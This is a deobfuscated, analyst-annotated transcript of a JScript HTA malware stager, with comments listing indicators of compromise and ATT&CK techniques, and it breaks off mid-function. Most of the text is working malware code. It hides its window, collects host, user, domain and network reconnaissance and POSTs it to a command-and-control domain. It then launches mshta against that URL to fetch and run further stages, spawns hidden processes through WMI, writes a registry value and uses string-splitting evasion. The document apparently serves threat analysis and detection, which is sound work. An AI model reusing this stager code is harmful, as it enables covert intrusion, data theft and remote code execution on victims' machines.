// === Analyst notes (deobfuscated transcript; the original obfuscated HTA follows further down) ===
// What this listing shows: an mshta-hosted JScript stager that hides its window, collects host /
// user / domain / network facts, POSTs them to http://crt.officecloud.top/st (see someCNCUrl),
// then launches `mshta <C2 URL>` to fetch the next stage, and -- in its "prfx" stage -- polls the
// same URL for job keys that are each executed by a fresh mshta. Process creation goes through WMI
// Win32_Process.Create, command output is captured via scratch files in %TEMP%, and strings are
// split or reversed to defeat simple signature matching.
// IOCs visible here: domain crt.officecloud.top; query parameter "vsxceymxlslzeqx="; beacon field
// separator " n0body i know "; %TEMP%\truew.tmp; mshta.exe launched with an http:// argument;
// HKCU\SOFTWARE\Microsoft\Internet Explorer\Styles\MaxScriptStatements written via StdRegProv.
// ATT&CK (analyst mapping): T1218.005 mshta, T1047 WMI, T1059.007 JScript, T1082/T1016/T1033
// discovery, T1071.001 HTTP C2, T1027 obfuscation, T1564.003 hidden window, T1112 registry.
//
// Anti-visibility prelude: park the HTA window off-screen, shrink it, and keep it from taking focus.
window.moveTo(-105, 300);
window.blur();
window.resizeTo(10, 15);
try {
// Swallow script errors so no error dialog ever surfaces to the user.
window.onerror = function(sMsg, sUrl, sLine) {
return false;
}
// Re-hide the window whenever it would gain focus.
window.onfocus = function() {
window.blur();
}
} catch (e) {}
// Container for every helper in the sample; in the original HTA this object is USZOOYWIZS.
var mainFuncStruct = {};
// Used by the original to un-reverse obfuscated fragments (e.g. rsS("lleh") -> "hell"). The
// transcript below already has those fragments in plain form, so nothing here calls it.
function reverseString(s) {
return s.split("").reverse().join("");
}
// ProgIDs are assembled from pieces so "Scripting.FileSystemObject" / "WScript.Shell" never occur
// as contiguous strings in the file (static-signature evasion).
mainFuncStruct.fileObj = new ActiveXObject("Scrip" + "ting.FileSystemOb" + "ject");
mainFuncStruct.shellObj = new ActiveXObject("WScrip" + "t.S" + "hell");
// C2 configuration. cncDomain and maybeToken are not referenced anywhere else in this listing;
// every request is built from someCNCUrl by getCncWithJobURL, with the job key appended.
mainFuncStruct.cncDomain = "http://crt.officecloud.top/st";
mainFuncStruct.maybeToken = "REDACTED";
// "" selects first-stage behaviour; the dispatch at the bottom compares this against "prfx".
mainFuncStruct.emptyIfFirstRun = "";
mainFuncStruct.someCNCUrl = "http://crt.officecloud.top/st?vsxceymxlslzeqx=REDACTED";
// Kill-date in epoch milliseconds, checked by CanHelp(); 999999999999999 ms is far enough in the
// future that the check never trips.
mainFuncStruct.highNumber = "999999999999999";
// Delay helper: a real setTimeout when a window object exists (mshta), otherwise a busy-wait spin
// that pegs a core for `ms` milliseconds and then invokes callback synchronously.
// Not called anywhere in this listing.
mainFuncStruct.callbackAfterTimeout = function(ms, callback) {
if (mainFuncStruct.isRunningInMshta()) {
window.setTimeout(callback, ms);
} else {
var now = new Date().getTime();
while (new Date().getTime() < now + ms);
callback();
}
}
// Self-termination, attempted in escalating order: close the HTA window through several
// equivalent handles (each wrapped so a failure is silent), WScript.Quit() for the
// cscript/wscript case, and finally a WMI kill of whatever PID getOwnPID() reports.
mainFuncStruct.killSelf = function() {
if (mainFuncStruct.isRunningInMshta()) {
try {
window["close"]();
} catch (e) {}
try {
window.self["close"]();
} catch (e) {}
try {
window.top["close"]();
} catch (e) {}
try {
self["close"]();
} catch (e) {}
// window.open('', '_self') is the old trick that lets a script close a window it did not open.
try {
window.open('', '_self', '');
window["close"]();
} catch (e) {}
}
try {
WScript.quit();
} catch (e) {}
// Last resort: locate our own PID via a spawned child process and terminate it through WMI.
try {
var pid = mainFuncStruct.funcStruct1.getOwnPID();
mainFuncStruct.funcStruct1.terminateProcessByPID(pid);
} catch (e) {}
}
// Host probe: a global `window` exists only under mshta/MSHTML, not under cscript/wscript.
// Most branching in the sample (delay, self-termination, run-loop choice) keys off this.
mainFuncStruct.isRunningInMshta = function() {
return typeof(window) !== "undefined";
}
// Complement of isRunningInMshta: true when the WScript object exists (cscript/wscript host).
// Not called anywhere in this listing.
mainFuncStruct.checkIfWscriptDefined = function() {
return typeof(WScript) !== "undefined";
}
// GUID-shaped random string from Math.random() -- neither a real GUID nor cryptographically
// random. Used only to name scratch files under %TEMP%. Because of the 0x1235612 multiplier each
// s4() segment is a variable-length hex run rather than the usual four digits, so the file names
// do not match a strict GUID regex.
mainFuncStruct.maybeGenGUID = function() {
try {
function s4() {
return Math.floor((1 + Math.random()) * 0x1235612).toString(16).substring(1);
}
return s4() + s4() + '-' + s4() + s4() + '-' + s4() + '-' +
s4() + '-' + s4() + s4() + s4();
} catch (e) {}
}
// funcStruct4: host reconnaissance helpers (original object FSZGCSETMH).
mainFuncStruct.funcStruct4 = {};
// Elevation probe. `net1 session` fails for a non-elevated token, in which case the `|| echo`
// fallback writes the marker "ofailur" into the output file; true is returned when the marker is
// absent, i.e. the command succeeded. getComputerInfo() renders a true result as "*" after the
// username. Each call creates and then deletes a random-named .log under %TEMP%.
mainFuncStruct.funcStruct4.getSessions = function() {
try {
var res = mainFuncStruct.funcStruct3.runCmdToFile("(net1 session || echo ofailur)", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log");
if (res.indexOf("ofailur") == -1) {
return true;
}
return false;
} catch (e) {
return false;
}
}
// OS fingerprint from the registry: "<ProductName>triplestar<CurrentBuildNumber>". The literal
// "triplestar" is the field separator the server expects; "Unknown" if either read fails.
mainFuncStruct.funcStruct4.readOsVersion = function() {
try {
var osver = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
var osbuild = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber");
return osver + "triplestar" + osbuild;
} catch (e) {}
return "Unknown";
}
// Domain-controller name from the Group Policy history key (presumably only populated on
// domain-joined hosts that have applied policy); "Unknown" if missing or empty. Lets the operator
// tell corporate targets from standalone machines without touching the network.
mainFuncStruct.funcStruct4.getDCName = function() {
try {
var DC = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName");
if (DC.length > 0) {
return DC;
}
} catch (e) {}
return "Unknown";
}
// Machine architecture from the system environment block in the registry (e.g. "AMD64"),
// "Unknown" on failure. Feeds the server's choice between 32- and 64-bit follow-on stages
// (see runMshtaFromCNC / fork32Bit).
mainFuncStruct.funcStruct4.getArch = function() {
try {
var arch = mainFuncStruct.shellObj.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE");
return arch;
} catch (e) {}
return "Unknown";
}
// Misnamed: it does not change directory. It runs the bare `cd` command (which prints the current
// directory) and returns its output. Unlike the other helpers it uses a FIXED scratch file name,
// %TEMP%\truew.tmp -- a useful host artefact / IOC.
mainFuncStruct.funcStruct4.cdToTempFolder = function() {
try {
var truew = mainFuncStruct.funcStruct3.runCmdToFile("cd", "%TEMP%\\truew.tmp");
return truew;
} catch (e) {}
return "";
}
// Primary IPv4 address via `route PRINT -4`: on the default-route row (the first row whose
// destination and netmask are both 0.0.0.0) the 4th non-empty column -- the Interface column in
// route's table layout -- is returned. "" if nothing matches or the command fails.
// `line`, `zerocount`, `itemcount` and `correctflag` are assigned without `var` and leak into the
// global scope (harmless here, but it is why they are visible to other functions).
mainFuncStruct.funcStruct4.getRoutingInfo = function() {
try {
var routeprint4 = mainFuncStruct.funcStruct3.runCmdToFile("route PRINT -4", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log");
var res = routeprint4.split("\r\n");
for (var i = 0; i < res.length; i++) {
line = res[i].split(" ");
zerocount = 0;
itemcount = 0;
correctflag = false;
for (var j = 0; j < line.length; j++) {
if (line[j]) {
itemcount += 1;
// correctflag is only set once the 2nd 0.0.0.0 has been seen, so the 1st/2nd columns can't match.
if (itemcount == 4 && correctflag) {
return line[j];
}
}
if (line[j] == "0.0.0.0") {
zerocount += 1;
if (zerocount == 2) {
correctflag = true;
}
}
}
}
} catch (e) {}
return "";
}
// Builds the host-recon beacon string that is POSTed on first run. Fields, joined by the literal
// separator " n0body i know ":
//   DOMAIN\user[*] | computer name | "<ProductName>triplestar<build>" | DC name | arch |
//   current directory | primary IPv4 | "1252" | "1252"
// where "*" marks an elevated session (getSessions). The domain falls back to `echo %userdomain%`
// when WScript.Network reports none; the `finally` runs even if that throws and tries to trim
// the echoed output at " \r\n". The separator string is a reliable network IOC for this family.
mainFuncStruct.funcStruct4.getComputerInfo = function() {
var net = new ActiveXObject("WScript.Network");
var domain = "";
if (net.UserDomain.length != 0) {
domain = net.UserDomain;
} else {
try {
domain = mainFuncStruct.funcStruct3.runCmdToFile("echo %userdomain%", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log");
} catch (h) {} finally {
domain = domain.split(" \r\n")[0];
}
}
var info = domain + "\\" + net.Username;
if (mainFuncStruct.funcStruct4.getSessions())
info += "*";
info += " n0body i know " + net.ComputerName;
info += " n0body i know " + mainFuncStruct.funcStruct4.readOsVersion();
info += " n0body i know " + mainFuncStruct.funcStruct4.getDCName();
info += " n0body i know " + mainFuncStruct.funcStruct4.getArch();
info += " n0body i know " + mainFuncStruct.funcStruct4.cdToTempFolder();
info += " n0body i know " + mainFuncStruct.funcStruct4.getRoutingInfo();
info += " n0body i know " + mainFuncStruct.funcStruct4.chcp();
info += " n0body i know " + mainFuncStruct.funcStruct4.getSomeCodePageNum();
return info;
}
// Stubbed to the constant "1252" (Windows-1252); the try/catch cannot throw. Every "936" check in
// runCmdToFile / readFileUntilSuccess2 is therefore dead in this build -- presumably the template
// originally probed the console code page (936 = Simplified Chinese) and this build hard-codes it.
mainFuncStruct.funcStruct4.chcp = function() {
try {
return "1252"
} catch (e) {
return "1252";
}
}
// Also stubbed to "1252"; the "437" fallback is unreachable because nothing in the try can throw.
// This value is what runCmdToFile prepends as `chcp 1252 &` before every captured command.
mainFuncStruct.funcStruct4.getSomeCodePageNum = function() {
try {
return "1252"
} catch (e) {
return "437";
}
}
// funcStruct6: C2 messaging (original object JLOOXOZDZT).
mainFuncStruct.funcStruct6 = {};
// Synchronous POST of `data` to the job URL (someCNCUrl + current job key + "&"), with optional
// extra request headers. Returns the XMLHTTP/WinHttp object so callers can read status/body.
mainFuncStruct.funcStruct6.sendDataToCNC = function(data, headers) {
return mainFuncStruct.funcStruct7.sendHTTPRequest(mainFuncStruct.funcStruct6.getCncWithJobURL(), data, headers);
}
// Error telemetry: POSTs e.message as the body and the JScript error number / name / description
// in custom request headers "errno", "errname", "errdesc" (another network IOC). Any failure is
// swallowed; note the catch's `e` shadows the parameter.
mainFuncStruct.funcStruct6.sendErrorDataToCNC = function(e) {
try {
var headers = {};
headers["errno"] = (e.number) ? e.number : "-1";
headers["errname"] = (e.name) ? e.name : "Unknown";
headers["errdesc"] = (e.description) ? e.description : "Unknown";
return mainFuncStruct.funcStruct6.sendDataToCNC(e.message, headers);
} catch (e) {}
}
// Job URL = someCNCUrl + jobkey + "&". With no argument the stage marker (emptyIfFirstRun, "" in
// this sample) is used, so the first-run URL ends "...vsxceymxlslzeqx=REDACTED&". The inner
// `var jobkey` merely re-declares the parameter.
mainFuncStruct.funcStruct6.getCncWithJobURL = function(jobkey) {
var jobkey = (typeof(jobkey) !== "undefined") ? jobkey : mainFuncStruct.emptyIfFirstRun;
return mainFuncStruct.someCNCUrl + jobkey + "&";
}
// The beacon poll used by CanHelp(). Despite the name it is a POST with an empty body (it calls
// funcStruct7.sendHTTPRequest, not funcStruct7.sendHTTPRequestEmpty, which is the GET variant).
mainFuncStruct.funcStruct6.sendHTTPRequestEmpty = function() {
var url = mainFuncStruct.funcStruct6.getCncWithJobURL();
return mainFuncStruct.funcStruct7.sendHTTPRequest(url);
}
// Next-stage launcher: runs `mshta <job URL>` so mshta itself fetches and executes whatever the C2
// serves for that job key (T1218.005). With fork32Bit the command is prefixed with the SysWOW64
// path (getSystemFolder), forcing the 32-bit mshta on 64-bit hosts. "stelsy" is just a placeholder
// replaced by the URL. The process is created through WMI (hidden, job-breakaway -- see
// createProcessReturnPID) and only falls back to WScript.Shell.Run (hidden, non-blocking) if the
// WMI path throws. Detection: mshta.exe with an http(s):// command line, parent WmiPrvSE.exe or mshta.exe.
mainFuncStruct.funcStruct6.runMshtaFromCNC = function(jobkey, fork32Bit) {
var fork32Bit = (typeof(fork32Bit) !== "undefined") ? fork32Bit : false;
var cmd = "mshta stelsy";
if (fork32Bit)
cmd = mainFuncStruct.funcStruct2.getSystemFolder() + cmd;
cmd = cmd.replace("stelsy", mainFuncStruct.funcStruct6.getCncWithJobURL(jobkey));
try {
mainFuncStruct.funcStruct6.createProcessReturnPID(cmd);
} catch (e) {
mainFuncStruct.shellObj.Run(cmd, 0, false);
}
}
// funcStruct7: raw HTTP transport (original object KTFJHNZIRI).
mainFuncStruct.funcStruct7 = {};
// Returns an HTTP client object. Prefers Msxml2.ServerXMLHTTP.6.0 with all four timeouts set to
// `~~[]` (== 0, i.e. no timeout), falling back to WinHttp.WinHttpRequest.5.1 with 0x7530 == 30000 ms
// resolve/connect/send timeouts and an unbounded receive timeout. ProgIDs are split to avoid
// contiguous strings.
mainFuncStruct.funcStruct7.getHttpRequestObj = function() {
var http = null;
try {
http = new ActiveXObject("Msxml2.ServerXMLH" + "TTP.6.0");
http.setTimeouts(~~[], ~~[], ~~[], ~~[]);
} catch (e) {
http = new ActiveXObject("WinHttp.WinHttpRe" + "quest.5.1");
http.setTimeouts(0x7530, 0x7530, 0x7530, ~~[]);
}
return http;
}
// Applies caller-supplied headers verbatim (failures ignored) and, unless one of them was
// Content-Type, defaults it to "application/json". The setRequestHeader method name is assembled
// from fragments in the original, hence the bracket form here.
mainFuncStruct.funcStruct7.setRequestHTTPHeaders = function(http, headers) {
var headers = (typeof(headers) !== "undefined") ? headers : {};
var content = false;
for (var key in headers) {
try {
var value = headers[key];
http.setRequestHeader(key, value);
} catch (h) {} finally {
if (key.toUpperCase() == "CONTENT-TYPE")
content = true;
}
}
if (!content)
http["setR" + "eque" + "stH" + "eader"]("Content-Type", "application/json");
}
// Synchronous (async=false) POST of `data` (default "") to `url`; returns the request object so the
// caller can inspect status and responseText. All C2 traffic in this sample goes through here.
mainFuncStruct.funcStruct7.sendHTTPRequest = function(url, data, headers) {
var data = (typeof(data) !== "undefined") ? data : "";
var http = mainFuncStruct.funcStruct7.getHttpRequestObj();
http.open("POST", url, false);
mainFuncStruct.funcStruct7.setRequestHTTPHeaders(http, headers);
http.send(data);
return http;
}
// Synchronous GET to `url`. Method names are built from fragments ("op"+"en", "se"+"nd") in the
// original. Not called by anything in this listing -- the beacon poll uses the POST variant above.
mainFuncStruct.funcStruct7.sendHTTPRequestEmpty = function(url, headers) {
var http = mainFuncStruct.funcStruct7.getHttpRequestObj();
http["op" + "en"]("GET", url, false);
mainFuncStruct.funcStruct7.setRequestHTTPHeaders(http, headers);
http["se" + "nd"]();
return http;
}
// funcStruct1: process discovery / termination via WMI (original object ERDXQCZMRN).
mainFuncStruct.funcStruct1 = {};
// Finds "our own" PID without an API that exposes it: spawn `%comspec% /K hostname` through
// createProcessReturnPID, find that child in Win32_Process, take its ParentProcessId, then kill
// the child. `latestTime` is unused; if the child is not found, latestProc stays null and the
// property access throws (killSelf swallows that).
// NOTE(review): the child is created via WMI, and WMI-created processes are typically parented by
// WmiPrvSE.exe rather than the script host, so the PID returned here may not be this script's --
// confirm in a sandbox before relying on it for triage. A side effect either way: a short-lived
// hidden cmd.exe running `hostname`, which is a usable process-telemetry signal.
mainFuncStruct.funcStruct1.getOwnPID = function() {
var cmd = mainFuncStruct.funcStruct2.expandEnvStrings("%comspec% /K hostname");
var childPid = mainFuncStruct.funcStruct6.createProcessReturnPID(cmd);
var pid = -1;
var latestTime = 0;
var latestProc = null;
var processes = mainFuncStruct.funcStruct1.getProcessList();
var items = new Enumerator(processes);
while (!items.atEnd()) {
var proc = items.item();
try {
if (proc.ProcessId == childPid) {
latestProc = proc;
break;
}
} catch (e) {}
items.moveNext();
}
pid = latestProc.ParentProcessId;
latestProc.Terminate();
return pid;
}
// Enumerates Win32_Process and calls Terminate() on the first entry whose ProcessId matches.
// Returns true on a kill, false if no match (or the match's Terminate threw).
mainFuncStruct.funcStruct1.terminateProcessByPID = function(pid) {
var processes = mainFuncStruct.funcStruct1.getProcessList();
var items = new Enumerator(processes);
while (!items.atEnd()) {
var proc = items.item();
try {
if (proc.ProcessId == pid) {
proc.Terminate();
return true;
}
} catch (e) {}
items.moveNext();
}
return false;
}
// Full process list from WMI (`Select * From Win32_Process` on root\cimv2 with impersonation).
mainFuncStruct.funcStruct1.getProcessList = function() {
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var query = "Select * From Win32_Process";
return wmi.ExecQuery(query);
}
// funcStruct5: registry writes through WMI StdRegProv (original object XDGAVBPIRF). Using WMI
// rather than WScript.Shell.RegWrite means the write is performed by the WMI provider host, which
// is worth knowing when building registry-modification detections for this family.
mainFuncStruct.funcStruct5 = {};
// Hive handles as StdRegProv expects them.
mainFuncStruct.funcStruct5.HKEY_CLASSES_ROOT = 0x80000000;
mainFuncStruct.funcStruct5.HKCU = 0x80000001;
mainFuncStruct.funcStruct5.HKLM = 0x80000002;
// Internal dispatch tags used only by setRegistryValue to choose a Set*Value method; they are
// never passed to WMI and are not registry type codes.
mainFuncStruct.funcStruct5.REG_STRING = 0;
mainFuncStruct.funcStruct5.REG_BINARY = 1;
mainFuncStruct.funcStruct5.REG_DWORD = 2;
mainFuncStruct.funcStruct5.REG_QWORD = 3;
// StdRegProv handle for `computer` (default "." = local); a remote name would target another host.
mainFuncStruct.funcStruct5.getWmiRegistryObject = function(computer) {
var computer = (typeof(computer) !== "undefined") ? computer : ".";
var reg = GetObject("winmgmts:\\\\" + computer + "\\root\\default:StdRegProv");
return reg;
}
// Creates `path` under `hKey` (no-op if it exists) and writes `key` = `value` with the setter
// chosen by valType. Unknown valType values write nothing. The only caller in this listing writes
// HKCU\...\Internet Explorer\Styles\MaxScriptStatements as a DWORD.
mainFuncStruct.funcStruct5.setRegistryValue = function(hKey, path, key, value, valType, computer) {
var reg = mainFuncStruct.funcStruct5.getWmiRegistryObject(computer);
reg.CreateKey(hKey, path);
if (valType == mainFuncStruct.funcStruct5.REG_STRING)
reg.SetStringValue(hKey, path, key, value);
else if (valType == mainFuncStruct.funcStruct5.REG_DWORD)
reg.SetDWORDValue(hKey, path, key, value);
else if (valType == mainFuncStruct.funcStruct5.REG_QWORD)
reg.SetQWORDValue(hKey, path, key, value);
else if (valType == mainFuncStruct.funcStruct5.REG_BINARY)
reg.SetBinaryValue(hKey, path, key, value);
}
// NOTE(review): deobfuscation artefact. This reassignment wipes the funcStruct6 C2 helpers
// (sendDataToCNC, sendErrorDataToCNC, runMshtaFromCNC, ...) defined earlier, so this transcript
// would fail at the first C2 call if executed. In the original HTA the process-creation helper
// lives on its own object (CMXWOMTDOO), separate from the C2 object (JLOOXOZDZT).
mainFuncStruct.funcStruct6 = {};
// Spawns `cmd` through WMI Win32_Process.Create instead of WScript.Shell.Run, with a hidden
// (ShowWindow = 0 = SW_HIDE), 1x1 window. CreateFlags 16777216 == 0x01000000 ==
// CREATE_BREAKAWAY_FROM_JOB, so the child is not bound by any job object attached to the script
// host. WMI-created processes are typically parented by WmiPrvSE.exe rather than mshta.exe, which
// breaks the parent/child link that process-tree detections key on. Returns the new ProcessId.
// `si.ySize` (lowercase y) is not the Win32_ProcessStartup property name (`YSize`), so that
// assignment is most likely a no-op.
mainFuncStruct.funcStruct6.createProcessReturnPID = function(cmd) {
var SW_HIDE = 0;
var pid = 0;
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2")
var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_();
si.ShowWindow = SW_HIDE;
si.CreateFlags = 16777216;
si.X = si.Y = si.XSize = si.ySize = 1;
var w32proc = wmi.Get("Win32_Process");
var method = w32proc.Methods_.Item("Create");
var inParams = method.InParameters.SpawnInstance_();
inParams.CommandLine = cmd;
inParams.CurrentDirectory = null;
inParams.ProcessStartupInformation = si;
var outParams = w32proc.ExecMethod_("Create", inParams);
return outParams.ProcessId;
}
// funcStruct3: shell execution (original object PUZLNFITWY).
mainFuncStruct.funcStruct3 = {};
// Runs a shell command hidden and synchronously with stdout+stderr redirected to stdOutPath, then
// reads the file back and deletes it. The command line is
//   cmd /c %c^oms^pec%^ /q /c chcp 1252 & <cmd> 1> <file> 2>&1
// The carets inside %comspec% are cmd escape characters that vanish at parse time, so the literal
// string "%comspec%" never appears on the recorded command line (signature evasion); the `chcp`
// prefix pins the console code page before <cmd> runs. Because chcp() is hard-coded to "1252" the
// readFileUntilSuccess branch is dead and readFileUntilSuccess2 is always used.
mainFuncStruct.funcStruct3.runCmdToFile = function(cmd, stdOutPath) {
cmd = "chcp " + mainFuncStruct.funcStruct4.getSomeCodePageNum() + " & " + cmd;
var c = "cmd /c %c^oms^pec%^ /q /c " + cmd + " 1> " + mainFuncStruct.funcStruct2.expandEnvStrings(stdOutPath);
c += " 2>&1";
// Window style 0 (hidden), bWaitOnReturn = true.
mainFuncStruct.shellObj.Run(c, 0, true);
if (mainFuncStruct.funcStruct4.chcp() == "936") {
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess(stdOutPath);
} else {
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess2(stdOutPath);
}
mainFuncStruct.funcStruct2.shellDeleteFile(stdOutPath);
return data;
}
// Hidden shell execution (`5 - 5` is window style 0). fork=true (the default) means Run does NOT
// wait, since bWaitOnReturn = !fork. The caret-escaped wrapper `c` is built but never used -- the
// raw `cmd` is what gets passed to Run. The original HTA has the same quirk, so the ping and
// certutil invocations launched through here appear unwrapped in process telemetry.
mainFuncStruct.funcStruct3.shellRunCommand = function(cmd, fork) {
var fork = (typeof(fork) !== "undefined") ? fork : true;
var c = "cmd /c %c^oms^pe^c% /q /c " + cmd;
mainFuncStruct.shellObj.Run(cmd, 5 - 5, !fork);
}
// funcStruct2: file-system helpers (original object WXUXMBSDFO).
mainFuncStruct.funcStruct2 = {};
// %VAR% expansion via WScript.Shell; every %TEMP% path in the sample goes through here.
mainFuncStruct.funcStruct2.expandEnvStrings = function(path) {
return mainFuncStruct.shellObj.ExpandEnvironmentStrings(path);
}
// Returns "%WINDIR%\SysWOW64\" when that folder exists (64-bit Windows), else "%WINDIR%\System32\".
// Used by runMshtaFromCNC to pick the 32-bit mshta binary on 64-bit hosts.
mainFuncStruct.funcStruct2.getSystemFolder = function() {
var base = mainFuncStruct.funcStruct2.expandEnvStrings("%WINDIR%");
var syswow64 = base + "\\SysWOW64\\";
if (mainFuncStruct.fileObj.FolderExists(syswow64))
return syswow64;
return base + "\\System32\\";
}
// Polls until `path` exists and is non-empty (at most 180 tries), then reads it as ASCII text
// (OpenTextFile mode 1 = ForReading, format 0 = ASCII). Each wait is `ping 127.0.0.1 -n 2`, a
// sleep substitute that shows up as repeated hidden ping.exe launches. A read error (e.g. the file
// still locked by its writer) retries WITHOUT incrementing loopcount, so that path can spin
// indefinitely. Returns "" when the 180-try budget is exhausted.
mainFuncStruct.funcStruct2.readFileUntilSuccess = function(path) {
var loopcount = 0;
while (true) {
if (mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)).Size > 0) {
try {
var fd = mainFuncStruct.fileObj.OpenTextFile(mainFuncStruct.funcStruct2.expandEnvStrings(path), 1, false, 0);
var data = fd.ReadAll();
fd.Close();
return data;
} catch (e) {
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false);
continue;
}
} else {
loopcount += 1;
if (loopcount > 180) {
return "";
}
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false);
}
}
}
// Variant of readFileUntilSuccess that runCmdToFile actually uses. If `exists` is set and the file
// is missing, a "Status: NotExist" header is reported to the C2 and "" returned. Once the file is
// present and non-empty: when chcp() is "936" or `certutil` is set, the file is first base64-encoded
// with `certutil -encode` (a LOLBin; the launch does not wait, the subsequent poll does) into
// another random %TEMP%\*.log, which is then read and deleted -- nothing here strips certutil's
// BEGIN/END CERTIFICATE wrapper lines, so the server side presumably does. Otherwise the file is
// read raw through OpenAsTextStream. No caller in this listing passes `exists` or `certutil`, and
// chcp() is hard-coded to "1252", so only the raw branch is live in this build.
mainFuncStruct.funcStruct2.readFileUntilSuccess2 = function(path, exists, certutil) {
var exists = (typeof(exists) !== "undefined") ? exists : false;
var certutil = (typeof(certutil) !== "undefined") ? certutil : false;
if (!mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && exists) {
var headers = {};
headers["Sta" + "tus"] = "Not" + "Exist";
mainFuncStruct.funcStruct6.sendDataToCNC("", headers);
return "";
}
var loopcount = 0;
while (true) {
if (mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)).Size > 0) {
if (mainFuncStruct.funcStruct4.chcp() == "936" || certutil) {
var newout = "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".l" + "og";
mainFuncStruct.funcStruct3.shellRunCommand("certut" + "il -encode " + mainFuncStruct.funcStruct2.expandEnvStrings(path) + " " + newout);
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess(newout);
mainFuncStruct.funcStruct2.shellDeleteFile(newout);
} else {
var fp = mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path));
var fd = fp.OpenAsTextStream();
var data = fd.read(fp.Size);
fd.close();
}
return data;
} else {
loopcount += 1;
if (loopcount > 180) {
return "";
}
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false);
}
}
}
// Force-deletes the (env-expanded) scratch file; this is the cleanup step that makes the %TEMP%
// .log / truew.tmp artefacts short-lived, so file-creation telemetry is the place to catch them.
mainFuncStruct.funcStruct2.shellDeleteFile = function(path) {
mainFuncStruct.fileObj.DeleteFile(mainFuncStruct.funcStruct2.expandEnvStrings(path), true);
};
// Entry point / stage dispatch. With emptyIfFirstRun == "" (this sample) the first branch runs:
//  1. under mshta, write HKCU\SOFTWARE\Microsoft\Internet Explorer\Styles\MaxScriptStatements =
//     0xFFFFFFFF via StdRegProv -- presumably to lift IE's "script is running slowly" threshold so
//     the long-running HTA is not interrupted (a registry artefact worth hunting for);
//  2. POST the recon string from getComputerInfo() to the C2;
//  3. launch `mshta <C2 URL>` to fetch the next stage (a failure is reported back via headers);
//  4. terminate.
// The else branch (emptyIfFirstRun == "prfx") is the beaconing stage: a bounded job loop under
// mshta, an unbounded one under cscript/wscript. The loop names LimitedRunLoop / InfiniteRunLoop
// were introduced by the deobfuscation; the original calls them CanHelpTimeout and CanHelpLoop.
// NOTE(review): in this transcript funcStruct6 is reassigned to {} before createProcessReturnPID,
// which would make sendDataToCNC / runMshtaFromCNC / sendErrorDataToCNC undefined here. In the
// original HTA those live on a different object (JLOOXOZDZT vs CMXWOMTDOO), so treat this listing
// as a reading aid rather than a faithful re-execution of the sample.
try {
if (mainFuncStruct.emptyIfFirstRun != "prfx") {
if (mainFuncStruct.isRunningInMshta()) {
var path = "SOFT" + "WARE\\Mi" + "crosoft\\I" + "nternet Explor" + "er\\St" + "yles";
var key = "Ma" + "xScriptStat" + "ements";
mainFuncStruct.funcStruct5.setRegistryValue(mainFuncStruct.funcStruct5.HKCU, path, key, 0xFFFFFFFF, mainFuncStruct.funcStruct5.REG_DWORD);
}
mainFuncStruct.funcStruct6.sendDataToCNC(mainFuncStruct.funcStruct4.getComputerInfo());
try {
mainFuncStruct.funcStruct6.runMshtaFromCNC("");
} catch (e) {
mainFuncStruct.funcStruct6.sendErrorDataToCNC(e)
}
mainFuncStruct.killSelf();
} else {
if (mainFuncStruct.isRunningInMshta())
LimitedRunLoop();
else
InfiniteRunLoop();
}
} catch (e) {
mainFuncStruct.funcStruct6.sendErrorDataToCNC(e);
}
// One beacon iteration. Returns 0 (stop) when the kill-date in highNumber has passed, when the C2
// answers with anything other than 200/201/202, or on any exception; otherwise 1 (keep polling).
// A non-empty response body is treated as a job key and handed to a fresh mshta; HTTP 202
// specifically requests the 32-bit (SysWOW64) mshta. The poll itself is a POST with an empty body
// (funcStruct6.sendHTTPRequestEmpty). Note parseInt without a radix on the kill-date string.
function CanHelp() {
var epoch = new Date().getTime();
var expire = parseInt(mainFuncStruct.highNumber);
if (epoch > expire) {
return 0;
}
try {
var work = mainFuncStruct.funcStruct6.sendHTTPRequestEmpty();
if (work.status == 201 || work.status == 202 || work.status == 200) {
if (work.responseText.length > 0) {
var jobkey = work.responseText;
mainFuncStruct.funcStruct6.runMshtaFromCNC(jobkey, work.status == 202);
}
} else {
return 0;
}
} catch (e) {
return 0;
}
return 1;
}
// cscript/wscript beacon loop: poll back-to-back (no sleep between iterations) until CanHelp()
// returns 0, then self-terminate. `an` is unused padding. Original name: CanHelpLoop.
function InfiniteRunLoop() {
var an = "undefined";
while (CanHelp());
mainFuncStruct.killSelf();
}
// mshta beacon loop: at most 10 polls (`5 * 5 - 15`), stopping early if CanHelp() fails. After
// the 10th poll it launches a fresh `mshta <C2 URL>` with an empty job key and exits -- the HTA
// hands off to a new instance of itself instead of running unbounded. `sn` is always "undefined",
// so the trailing `if` always holds. Original name: CanHelpTimeout.
function LimitedRunLoop() {
var sn = "undefined";
for (var i = (1 - 1); i < (5 * 5 - 15); ++i) {
